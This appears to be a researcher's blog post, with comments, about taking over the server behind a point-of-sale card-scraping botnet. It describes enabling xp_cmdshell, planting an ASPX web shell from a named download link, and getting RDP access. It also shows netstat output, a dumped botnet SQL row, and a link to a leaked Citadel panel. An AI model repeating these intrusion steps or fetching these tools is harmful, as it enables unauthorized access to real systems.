a POS malware loaded via Andromeda according to him.
I've asked him to write something so i will not explain you the life about how this malware work, have a look here: http://aassfxxx.infos.st/article21/pos-malware-ram-scrapper
But like i've told him on comment... root the fucker !
The bad guys run a windows server, track2 are sent on it (or shits grabbed, i've not reversed the exe so i don't know what is grabbed actually)
have to thanks him for the bad configuration who allow you to enable xp_cmdshell (LOL)
aspx backdoor... can be downloaded from rootkit.net.cn/code/aspxspy2.rar
VT: 31/46
RDPwned:
Users:
No more IIS please
They even use cracked app:
Proto Local Address Foreign Address State
TCP 93.170.130.109:443 98:43166 ESTABLISHED
TCP 93.170.130.109:56161 UBUNTU:microsoft-ds ESTABLISHED
TCP 93.170.130.109:56360 mail:60586 SYN_SENT
TCP 127.0.0.1:1433 genuine:54808 ESTABLISHED
TCP 127.0.0.1:1433 genuine:56348 TIME_WAIT
TCP 127.0.0.1:54808 genuine:ms-sql-s ESTABLISHED
TCP 127.0.0.1:56349 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56350 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56351 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56352 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56353 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56354 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56355 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56356 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56357 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56358 genuine:ms-sql-s TIME_WAIT
TCP 93.170.130.109:443 98:43166 ESTABLISHED
TCP 93.170.130.109:56161 UBUNTU:microsoft-ds ESTABLISHED
TCP 93.170.130.109:56360 mail:60586 SYN_SENT
TCP 127.0.0.1:1433 genuine:54808 ESTABLISHED
TCP 127.0.0.1:1433 genuine:56348 TIME_WAIT
TCP 127.0.0.1:54808 genuine:ms-sql-s ESTABLISHED
TCP 127.0.0.1:56349 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56350 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56351 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56352 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56353 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56354 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56355 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56356 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56357 genuine:ms-sql-s TIME_WAIT
TCP 127.0.0.1:56358 genuine:ms-sql-s TIME_WAIT
Stuff grabbed:
More than 600 strings inside.
Not related but also fun (cf: @MalwareScene):
INSERT INTO `bots` (`id`, `last_ip`, `last_online`, `new`, `version`, `traffic`, `command`, `regdate`) VALUES
('1', '84.22.122.6', 1299217483, 0, '8.0.0b', 1337, 'demo', '0000-00-00 00:00:00');
inetnum: 84.22.122.0 - 84.22.122.255
netname: A84-22-122-0
descr: REPUBLIC CYBERBUNKER INFRASTRUCTURE
role: Ministery of Telecommunications
address: One CyberBunker Avenue
address: CB-31337
address: CyberBunker-1
('1', '84.22.122.6', 1299217483, 0, '8.0.0b', 1337, 'demo', '0000-00-00 00:00:00');
inetnum: 84.22.122.0 - 84.22.122.255
netname: A84-22-122-0
descr: REPUBLIC CYBERBUNKER INFRASTRUCTURE
role: Ministery of Telecommunications
address: One CyberBunker Avenue
address: CB-31337
address: CyberBunker-1
And finally... another idiot leaving stuff, including the latest panel of Citadel.
hxtp://monstercvv.cc/Citadel%201.3.5.1.zip
How did you get the RDPaccess?Weak password?
ReplyDeleteAdded an user with xp_cmdshell
ReplyDeleteWhy index.php of citadel is empty?
ReplyDelete